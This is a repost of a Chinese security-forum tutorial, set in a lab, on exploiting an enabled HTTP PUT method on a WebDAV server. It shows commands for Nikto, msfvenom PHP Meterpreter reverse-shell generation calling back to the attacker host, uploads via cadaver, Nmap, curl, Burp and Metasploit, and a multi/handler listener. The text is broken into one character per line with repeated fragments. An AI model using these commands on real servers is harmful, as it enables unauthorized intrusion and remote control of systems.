论坛
BBS
空间测绘
发表
发布文章
提问答疑
搜索
您还未登录
登录后即可体验更多功能
立即登录
我的收藏
提问答疑
我要投稿
漏洞
[16562] 2021-03-17_安全研究多种方式利用HTTPPUT方法漏洞
文档创建者:
s7ckTeam
浏览次数:
11
最后更新:
2025-01-18
漏洞
11 人阅读
|
0 人回复
s7ckTeam
s7ckTeam
当前离线
积分
-54
6万
主题
-6万
回帖
-54
积分
管理员
积分
-54
发消息
2021-03-17_安全研究多种方式利用HTTPPUT方法漏洞
安
全
研
究
|
多
种
方
式
利
用
H
T
T
P
P
U
T
方
法
漏
洞
c
l
o
u
d
s
F
r
e
e
B
u
f
2
0
2
1
-
0
3
-
1
7
今
天
分
享
的
文
章
是
对
今
天
分
享
的
文
章
是
对
H
T
T
P
P
U
T
方
方
法
开
启
漏
洞
的
多
种
应
用
讲
析
,
在
实
战
场
景
中
,
首
先
我
们
要
确
定
目
标
网
站
是
否
启
用
了
法
开
启
漏
洞
的
多
种
应
用
讲
析
,
在
实
战
场
景
中
,
首
先
我
们
要
确
定
目
标
网
站
是
否
启
用
了
H
T
T
P
P
U
T
方
法
,
如
果
启
用
的
话
,
我
们
就
可
方
法
,
如
果
启
用
的
话
,
我
们
就
可
以
结
合
多
种
利
用
工
具
和
相
关
方
法
,
向
目
标
网
站
上
传
以
结
合
多
种
利
用
工
具
和
相
关
方
法
,
向
目
标
网
站
上
传
M
e
t
e
r
p
r
e
t
e
r
反
弹
反
弹
s
h
e
l
l
,
实
现
进
一
步
的
渗
透
控
制
。
一
起
来
看
看
。
,
实
现
进
一
步
的
渗
透
控
制
。
一
起
来
看
看
。
H
T
T
P
P
U
T
方
法
介
绍
方
法
介
绍
H
T
T
P
P
U
T
方
法
最
早
目
的
用
于
文
件
管
理
操
作
,
可
以
对
网
站
服
务
器
中
的
文
件
实
现
更
改
删
除
的
更
新
操
作
,
该
方
法
往
往
可
以
导
致
各
种
文
件
上
传
漏
洞
,
造
成
严
重
的
网
站
攻
击
事
件
。
在
实
际
运
用
中
,
若
必
须
启
用
该
方
法
,
则
需
要
对
该
方
法
涉
及
的
相
关
文
件
资
源
做
好
严
格
的
访
问
权
限
控
制
。
测
试
环
境
测
试
环
境
目
标
机
器
:
M
e
t
a
s
p
l
o
i
t
a
b
l
e
2
-
I
P
地
址
1
9
2
.
1
6
8
.
1
.
1
0
3
攻
击
机
器
:
K
a
l
i
L
i
n
u
x
-
I
P
地
址
1
9
2
.
1
6
8
.
1
.
1
0
5
N
i
k
t
o
扫
描
目
标
机
器
扫
描
目
标
机
器
H
T
T
P
P
U
T
方
法
是
否
启
用
方
法
是
否
启
用
假
设
我
们
的
攻
击
机
器
K
a
l
i
L
i
n
u
x
I
P
地
址
为
1
9
2
.
1
6
8
.
1
.
1
0
5
,
目
标
机
器
I
P
地
址
为
1
9
2
.
1
6
8
.
1
.
1
0
3
,
且
目
标
机
器
部
署
了
W
e
b
D
A
V
服
务
,
一
般
情
况
下
W
e
b
D
A
V
会
集
成
H
T
T
P
G
E
T
P
U
T
P
O
S
T
G
E
T
等
多
种
方
法
。
如
下
:
首
先
,
我
们
需
要
确
定
目
标
机
器
是
否
开
启
H
T
T
P
P
U
T
方
法
。
这
里
我
们
用
到
了
扫
描
探
测
工
具
N
i
k
t
o
:
n
i
k
t
o
-
h
h
t
t
p
:
/
/
1
9
2
.
1
6
8
.
1
.
1
0
3
/
d
a
v
/
从
探
测
结
果
可
知
,
目
标
机
器
启
用
了
H
T
T
P
P
U
T
方
法
,
那
接
下
来
,
我
们
就
考
虑
用
多
种
方
法
向
该
目
标
机
器
中
上
传
恶
意
P
H
P
文
件
,
实
现
进
一
步
渗
透
控
制
。
用
用
M
s
f
v
e
n
o
m
来
生
成
反
弹
控
制
来
生
成
反
弹
控
制
S
h
e
l
l
M
s
f
v
e
n
o
m
模
块
可
用
以
下
命
令
来
自
动
生
成
我
们
想
要
的
P
H
P
反
弹
控
制
S
h
e
l
l
,
该
S
h
e
l
l
文
件
就
是
我
们
将
要
上
传
的
恶
意
P
H
P
文
件
:
复
制
以
上
黄
色
部
分
,
即
从
<
?
p
h
p
到
d
i
e
(
)
的
字
段
内
容
,
并
以
名
称
s
h
e
l
l
.
p
h
p
保
存
在
桌
面
(
D
e
s
k
t
o
p
)
,
以
备
后
用
。
同
时
,
我
们
用
m
s
f
c
o
n
s
o
l
e
命
令
打
开
M
e
t
a
s
p
l
o
i
t
,
使
用
模
块
m
u
l
t
i
/
h
a
n
d
l
e
r
,
执
行
P
H
P
s
h
e
l
l
上
传
后
的
监
听
连
接
。
用
用
C
a
d
a
v
e
r
实
现
对
实
现
对
H
T
T
P
P
U
T
方
法
的
漏
洞
利
用
方
法
的
漏
洞
利
用
C
a
d
a
v
e
r
是
K
a
l
i
中
用
来
执
行
从
W
e
b
D
A
V
中
上
传
下
载
文
件
的
一
个
命
令
行
工
具
,
通
过
以
下
命
令
进
行
目
标
机
器
d
a
v
目
录
:
然
后
,
执
行
s
h
e
l
l
.
p
h
p
上
传
命
令
:
m
s
f
v
e
n
o
m
-
p
p
h
p
/
m
e
t
e
r
p
r
e
t
e
r
/
r
e
v
e
r
s
e
_
t
c
p
l
h
o
s
t
=
1
9
2
.
1
6
8
.
1
.
1
0
5
l
p
o
r
t
=
4
4
4
4
-
f
r
a
w
c
a
d
a
v
e
r
h
t
t
p
:
/
/
1
9
2
.
1
6
8
.
1
.
1
0
3
/
d
a
v
/
p
u
t
/
r
o
o
t
/
D
e
s
k
t
o
p
/
s
h
e
l
l
.
p
h
p
访
问
链
接
1
9
2
.
1
6
8
.
1
.
1
0
3
/
d
a
v
/
查
看
s
h
e
l
l
.
p
h
p
是
否
上
传
成
功
,
可
见
已
经
成
功
上
传
:
使
用
之
前
提
到
的
M
e
t
a
s
p
l
o
i
t
模
块
m
u
l
t
i
/
h
a
n
d
l
e
r
,
设
置
L
H
O
S
T
、
L
P
O
R
T
(
端
口
)
后
,
以
命
令
e
x
p
l
o
i
t
执
行
后
续
对
本
机
1
9
2
.
1
6
8
.
1
.
1
0
5
:
4
4
4
4
的
监
听
:
然
后
,
我
们
访
问
刚
才
目
标
机
器
h
t
t
p
:
/
/
1
9
2
.
1
6
8
.
1
.
1
0
3
/
d
a
v
/
中
上
传
的
s
h
e
l
l
.
p
h
p
文
件
,
点
击
访
问
它
,
之
后
,
在
我
们
的
M
e
t
a
s
p
l
o
i
t
中
即
会
返
回
一
个
监
听
反
弹
连
接
,
接
着
输
入
命
令
m
e
t
e
r
p
r
e
t
e
r
>
s
y
s
i
n
f
o
,
即
可
查
看
到
目
标
机
器
的
相
关
操
作
系
统
信
息
:
用
用
N
m
a
p
实
现
对
实
现
对
H
T
T
P
P
U
T
方
法
的
漏
洞
利
用
方
法
的
漏
洞
利
用
N
m
a
p
是
大
家
再
熟
悉
不
过
的
安
全
工
具
了
,
如
果
目
标
机
器
开
启
了
P
U
T
方
法
,
那
么
我
们
同
样
用
N
m
a
p
可
以
执
行
s
h
e
l
l
上
传
,
只
不
过
我
们
需
要
事
先
定
义
好
相
关
的
上
传
路
径
和
上
传
文
件
,
这
里
就
把
上
传
路
径
为
设
置
为
/
d
a
v
/
,
上
传
文
件
s
h
e
l
l
还
是
之
前
的
s
h
e
l
l
.
p
h
p
,
此
处
为
了
有
所
区
分
,
我
们
把
其
名
称
变
换
为
n
m
a
p
.
p
h
p
:
m
s
f
>
u
s
e
e
x
p
l
o
i
t
/
m
u
l
t
i
/
h
a
n
d
l
e
r
m
s
f
e
x
p
l
o
i
t
(
h
a
n
d
l
e
r
)
>
s
e
t
p
a
y
l
o
a
d
p
h
p
/
m
e
t
e
r
p
r
e
t
e
r
/
r
e
v
e
r
s
e
_
t
c
p
m
s
f
e
x
p
l
o
i
t
(
h
a
n
d
l
e
r
)
>
s
e
t
l
h
o
s
t
1
9
2
.
1
6
8
.
1
.
1
0
5
m
s
f
e
x
p
l
o
i
t
(
h
a
n
d
l
e
r
)
>
s
e
t
l
p
o
r
t
4
4
4
4
m
s
f
e
x
p
l
o
i
t
(
h
a
n
d
l
e
r
)
>
e
x
p
l
o
i
t
n
m
a
p
-
p
8
0
1
9
2
.
1
6
8
.
1
.
1
0
3
—
s
c
r
i
p
t
h
t
t
p
-
p
u
t
—
s
c
r
i
p
t
-
a
r
g
s
h
t
t
p
-
p
u
t
.
u
r
l
=
’
/
d
a
v
/
n
m
a
p
.
p
h
p
’
,
h
t
t
p
-
p
u
t
.
f
i
l
e
=
’
/
r
o
o
t
/
D
e
s
k
t
o
p
/
n
m
a
p
.
p
h
p
’
n
m
a
p
.
p
h
p
成
功
上
传
后
,
我
们
一
样
可
通
过
目
标
机
器
中
的
U
R
L
链
接
访
问
确
认
:
同
样
的
,
使
用
M
e
t
a
s
p
l
o
i
t
模
块
m
u
l
t
i
/
h
a
n
d
l
e
r
,
设
置
L
H
O
S
T
、
L
P
O
R
T
(
端
口
)
后
,
执
行
对
本
机
1
9
2
.
1
6
8
.
1
.
1
0
5
:
4
4
4
4
的
监
听
,
然
后
我
们
访
问
目
标
机
器
上
的
n
m
a
p
.
p
h
p
,
M
e
t
a
s
p
l
o
i
t
中
就
会
成
功
返
回
一
个
控
制
连
接
s
h
e
l
l
:
用
用
P
o
s
t
e
r
实
现
对
实
现
对
H
T
T
P
P
U
T
方
法
的
漏
洞
利
用
方
法
的
漏
洞
利
用
P
o
s
t
e
r
是
F
i
r
e
f
o
x
的
一
个
应
用
插
件
,
用
来
实
现
终
端
用
户
与
远
程
W
e
b
服
务
端
之
间
的
H
T
T
P
交
互
,
其
中
包
含
了
G
E
T
,
P
O
S
T
,
P
U
T
和
D
E
L
E
T
E
方
法
,
以
及
相
应
的
请
求
内
容
和
请
求
体
构
造
。
这
里
,
事
先
准
备
好
需
要
上
传
的
p
o
s
t
e
r
.
p
h
p
(
即
之
前
的
s
h
e
l
l
.
p
h
p
)
,
在
F
i
r
e
f
o
x
中
安
装
P
o
s
t
e
r
插
件
,
从
F
i
r
e
f
o
x
菜
单
栏
中
打
开
P
o
s
t
e
r
,
在
目
标
U
R
L
区
域
按
照
以
下
U
R
L
链
接
填
入
,
并
选
择
本
地
桌
面
的
p
o
s
t
e
r
.
p
h
p
作
为
上
传
文
件
,
执
行
P
U
T
操
作
。
访
问
1
9
2
.
1
6
8
.
1
.
1
0
3
/
d
a
v
,
确
认
p
o
s
t
e
r
.
p
h
p
被
成
功
上
传
:
使
用
M
e
t
a
s
p
l
o
i
t
模
块
m
u
l
t
i
/
h
a
n
d
l
e
r
,
设
置
L
H
O
S
T
、
L
P
O
R
T
(
端
口
)
后
,
执
行
对
本
机
1
9
2
.
1
6
8
.
1
.
1
0
5
:
4
4
4
4
的
监
听
,
然
后
我
们
访
问
目
标
机
器
上
的
p
o
s
t
e
r
.
p
h
p
,
M
e
t
a
s
p
l
o
i
t
中
就
会
成
功
返
回
一
个
控
制
连
接
s
h
e
l
l
:
用
用
B
u
r
p
s
u
i
t
e
实
现
对
实
现
对
H
T
T
P
P
U
T
方
法
的
漏
洞
利
用
方
法
的
漏
洞
利
用
B
u
r
p
s
u
i
t
e
是
当
前
流
行
的
测
试
利
器
了
,
通
过
配
置
拦
截
I
n
t
e
r
c
e
p
t
代
理
,
开
启
拦
截
I
n
t
e
r
c
e
p
t
i
s
o
n
后
,
我
们
访
问
h
t
t
p
:
/
/
1
9
2
.
1
6
8
.
1
.
1
0
3
,
即
可
在
拦
截
区
域
中
发
现
以
下
G
E
T
请
求
:
右
键
点
击
S
e
n
d
t
o
t
h
e
r
e
p
e
a
t
e
r
,
之
后
,
我
们
把
G
E
T
访
求
替
换
为
P
U
T
方
法
,
并
定
义
相
关
上
传
文
件
,
即
P
U
T
/
d
a
v
/
b
u
r
p
.
p
h
p
H
T
T
P
/
1
.
1
,
另
外
还
需
把
之
前
的
s
h
e
l
l
.
p
h
p
内
容
粘
贴
在
末
尾
,
执
行
P
U
T
请
求
,
目
标
机
器
给
出
成
功
响
应
,
如
下
图
所
示
:
访
问
1
9
2
.
1
6
8
.
1
.
1
0
3
/
d
a
v
,
确
认
b
u
r
p
.
p
h
p
已
成
功
上
传
:
使
用
M
e
t
a
s
p
l
o
i
t
模
块
m
u
l
t
i
/
h
a
n
d
l
e
r
,
设
置
L
H
O
S
T
、
L
P
O
R
T
(
端
口
)
后
,
执
行
对
本
机
1
9
2
.
1
6
8
.
1
.
1
0
5
:
4
4
4
4
的
监
听
,
然
后
我
们
访
问
目
标
机
器
上
的
b
u
r
p
.
p
h
p
,
M
e
t
a
s
p
l
o
i
t
中
就
会
成
功
返
回
一
个
控
制
连
接
s
h
e
l
l
:
用
用
M
e
t
a
s
p
l
o
i
t
实
现
对
实
现
对
H
T
T
P
P
U
T
方
法
的
漏
洞
利
用
方
法
的
漏
洞
利
用
这
里
,
我
们
还
要
说
说
用
M
e
t
a
s
p
l
o
i
t
本
身
来
对
P
U
T
方
法
的
漏
洞
利
用
,
用
其
内
置
的
a
u
x
i
l
i
a
r
y
/
s
c
a
n
n
e
r
/
h
t
t
p
/
h
t
t
p
_
p
u
t
模
块
就
能
完
成
相
关
s
h
e
l
l
文
件
m
e
t
e
r
.
p
h
p
的
上
传
操
作
:
访
问
1
9
2
.
1
6
8
.
1
.
1
0
3
/
d
a
v
,
确
认
m
e
t
e
r
.
p
h
p
已
成
功
上
传
:
使
用
M
e
t
a
s
p
l
o
i
t
模
块
m
u
l
t
i
/
h
a
n
d
l
e
r
设
置
监
听
,
访
问
目
标
机
器
上
的
m
e
t
e
r
.
p
h
p
,
M
e
t
a
s
p
l
o
i
t
监
听
进
程
就
会
成
功
返
回
一
个
控
制
连
接
s
h
e
l
l
:
用
用
c
U
R
L
实
现
对
实
现
对
H
T
T
P
P
U
T
方
法
的
漏
洞
利
用
方
法
的
漏
洞
利
用
最
后
要
说
的
当
然
还
有
c
U
R
L
了
,
c
U
R
L
也
是
一
个
流
行
的
命
令
行
H
T
T
P
交
互
工
具
,
可
用
它
来
执
行
H
T
T
P
S
,
F
T
P
,
S
C
P
,
L
D
A
P
,
T
e
l
n
e
t
等
多
种
协
议
的
通
信
交
互
。
这
里
,
我
们
用
以
下
命
令
来
执
行
对
目
标
机
器
的
s
h
e
l
l
文
件
c
u
r
l
.
p
h
p
的
上
传
:
c
u
r
l
h
t
t
p
:
/
/
1
9
2
.
1
6
8
.
1
.
1
0
3
/
d
a
v
/
—
u
p
l
o
a
d
-
f
i
l
e
/
r
o
o
t
/
D
e
s
k
t
o
p
/
c
u
r
l
.
p
h
p
-
v
访
问
1
9
2
.
1
6
8
.
1
.
1
0
3
/
d
a
v
,
确
认
c
u
r
l
.
p
h
p
已
成
功
上
传
:
同
样
,
使
用
M
e
t
a
s
p
l
o
i
t
模
块
m
u
l
t
i
/
h
a
n
d
l
e
r
设
置
监
听
,
访
问
目
标
机
器
上
的
c
u
r
l
.
p
h
p
,
成
功
返
回
对
目
标
机
器
的
控
制
连
接
s
h
e
l
l
:
精
彩
推
荐
精
彩
推
荐
阅
读
原
文
回复
举报
上一个主题
下一个主题
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
!disable!!post_parseurl!
使用Markdown编辑器编辑
使用富文本编辑器编辑
回帖后跳转到最后一页
发表
漏洞